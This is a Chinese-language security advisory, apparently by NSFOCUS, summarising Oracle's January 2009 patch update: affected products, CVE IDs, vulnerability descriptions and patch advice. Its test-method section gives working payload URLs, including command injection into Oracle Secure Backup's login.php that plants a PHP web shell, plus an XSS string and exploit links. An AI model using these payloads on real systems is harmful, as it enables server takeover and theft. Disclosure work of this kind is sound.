安全研究

安全漏洞
Oracle 2009年1月紧急补丁更新修复多个漏洞

发布日期:2009-01-14
更新日期:2009-01-15

受影响系统:
BEA Systems Weblogic Server 9.2
BEA Systems Weblogic Server 9.1 GA
BEA Systems Weblogic Server 9.0 GA
BEA Systems Weblogic Server 8.1
BEA Systems Weblogic Server 7.0
BEA Systems Weblogic Server 10.0
Oracle Application Server 10.1.3.3.0
Oracle Application Server 10.1.2.3.0
Oracle Application Server 10.1.2.2.0
Oracle E-Business Suite 12.0.6
Oracle E-Business Suite 11.5.10.2
Oracle Enterprise Manager Grid Control 10.2.0.4
BEA Systems WebLogic Portal 9.2
BEA Systems WebLogic Portal 8.1
BEA Systems WebLogic Portal 10.0
Oracle Collaboration Suite 10.1.2
Oracle Database 9.2.0.8DV
Oracle Database 9.2.0.8
Oracle Database 11.1.0.6    
Oracle Database 10.2.0.4
Oracle Database 10.2.0.3
Oracle Database 10.2.0.2
Oracle Database 10.1.0.5
Oracle TimesTen In-Memory Database 7.0.5.4.0
Oracle TimesTen In-Memory Database 7.0.5.3.0
Oracle TimesTen In-Memory Database 7.0.5.2.0
Oracle TimesTen In-Memory Database 7.0.5.1.0
Oracle Secure Backup 10.2.0.3
Oracle Secure Backup 10.2.0.2
Oracle Secure Backup 10.1.0.3
Oracle Secure Backup 10.1.0.2
Oracle Secure Backup 10.1.0.1
Oracle PeopleSoft Enterprise HRMS 9.0
Oracle PeopleSoft Enterprise HRMS 8.9
Oracle JD Edwards Tools 8.97
描述:
BUGTRAQ  ID: 33177
CVE(CAN) ID: CVE-2008-2623,CVE-2008-4014,CVE-2008-4017,CVE-2008-5438,CVE-2008-5446,CVE-2008-5450,CVE-2008-5454,CVE-2008-5458,CVE-2008-5457,CVE-2008-5459,CVE-2008-5460,CVE-2008-5461,CVE-2008-5462,CVE-2008-3973,CVE-2008-3974,CVE-2008-3978,CVE-2008-3979,CVE-2008-3997,CVE-2008-3999,CVE-2008-4015,CVE-2008-5436,CVE-2008-5437,CVE-2008-5439,CVE-2008-5447,CVE-2008-4016,CVE-2008-3981,CVE-2008-4006,CVE-2008-5441,CVE-2008-5442,CVE-2008-5443,CVE-2008-5444,CVE-2008-5445,CVE-2008-5448,CVE-2008-5449,CVE-2008-4007,CVE-2008-5451,CVE-2008-5452,CVE-2008-5455,CVE-2008-5456,CVE-2008-5463,CVE-2008-5440

Oracle Database是一款商业性质大型数据库系统。

Oracle发布了2009年1月的紧急补丁更新公告,修复了多个Oracle产品中的多个漏洞。这些漏洞影响Oracle产品的所有安全属性,可导致本地和远程的威胁。其中一些漏洞可能需要各种级别的授权,但也有些不需要任何授权。最严重的漏洞可能导致完全入侵数据库系统。

1) Oracle数据库中的函数允许通过认证的用户以提升的权限创建或重写任意文件。

2) Oracle Secure Backup Administration Server的php/login.php中没有正确地过滤通过cookie所传送的输入,这可能导致注入并执行任意shell命令。

3) Oracle Secure Backup Administration Server的php/common.php文件中没有正确地验证某些参数输入,这可能导致注入并执行任意shell命令。

4) 在执行MDSYS.SDO_TOPO_DROP_FTBL触发时没有正确地过滤某些输入,远程攻击者可以执行SQL注入攻击。成功攻击要求拥有CREATE SESSION权限。

5) 没有正确地过滤对BPELConsole/default/activities.jsp所传送的URL输入便返回给了用户,这可能导致在管理员的浏览器会话中执行任意HTML和脚本代码。

6) Apache、Sun,和IIS Web服务器的WebLogic插件在处理特制的HTTP请求时存在缓冲区溢出漏洞。

7) Oracle TimesTen的timestend守护程序的evtdump CGI模块没有正确地过滤msg参数,允许远程攻击者执行格式串攻击。

8) 默认下Oracle Secure Backup在TCP 400端口监听Oracle的私有协议数据。如果向这个端口发送了畸形数据的话,就会导致拒绝服务。

9) 向Oracle Secure Backup发送畸形的NDMP客户端认证(NDMP_CONECT_CLIENT_AUTH命令)报文可以触发缓冲区溢出。

10) 发送畸形的NDMP connect open(NDMP_CONNECT_OPEN命令)、NDMP connect close(NDMP_CONNECT_CLOSE命令)、NDMP mover get state(NDMP_MOVER_GET_STATE命令)报文都会导致数据库崩溃。

<*来源:Esteban Martinez Fayo
        Joxean Koret (joxeankoret@yahoo.es
        Alexander Kornbrus
        Deniz CEVIK (Deniz.Cevik@intellect.com.tr
  
  链接:http://secunia.com/advisories/33535/
        http://secunia.com/advisories/33526/
        http://secunia.com/advisories/33525/
        http://marc.info/?l=bugtraq&m=123197073211801&w=2
        http://marc.info/?l=bugtraq&m=123197020010924&q=p5
        http://marc.info/?l=bugtraq&m=123196965209999&w=2
        http://marc.info/?l=bugtraq&m=123196927709101&w=2
        http://marc.info/?l=bugtraq&m=123195542917204&q=p3
        http://marc.info/?l=bugtraq&m=123195368014157&w=2
        https://support.bea.com/application_content/product_portlets/securityadvisories/2809.html
        https://support.bea.com/application_content/product_portlets/securityadvisories/2807.html
        https://support.bea.com/application_content/product_portlets/securityadvisories/2810.html
        https://support.bea.com/application_content/product_portlets/securityadvisories/2811.html
        https://support.bea.com/application_content/product_portlets/securityadvisories/2808.html
        http://marc.info/?l=bugtraq&m=123204043220270&w=2
        http://marc.info/?l=bugtraq&m=123203983618888&w=2
        http://marc.info/?l=bugtraq&m=123203920317600&w=2
        http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2009.html?_template=/o
        http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=769
        http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=768
        http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=767
        http://www.us-cert.gov/cas/techalerts/TA09-015A.html
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

https://<target>/login.php?clear=no&ora_osb_lcookie=aa&ora_osb_bgcookie=bb&button=Logout&rbtool=cmd.exe+/c+echo+hello+world+%3E+c:\oracle.secure.backup.txt+;
https://<target>/login.php?clear=no&ora_osb_lcookie=aa&ora_osb_bgcookie=bb&button=Logout&rbtool=cmd.exe+/c+echo+%22%3C%3Fphp+print(shell_exec(%24_GET%5B'a'%5D))%3B+%3F%3E%22+%3E+test.php%3B%26%26+echo
http://[localhost]:8888/BPELConsole/default/activities.jsp?'><script>alert('DSEC_XSS')</script>=DSecRG

http://www.milw0rm.com/exploits/7785
http://www.milw0rm.com/exploits/8074
http://www.milw0rm.com/exploits/8336

建议:
厂商补丁:

Oracle
------
Oracle已经为此发布了一个安全公告(cpujan2009)以及相应补丁:
cpujan2009:Oracle Critical Patch Update Advisory - January 2009
链接:http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2009.html?_template=/o

浏览次数:5390
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障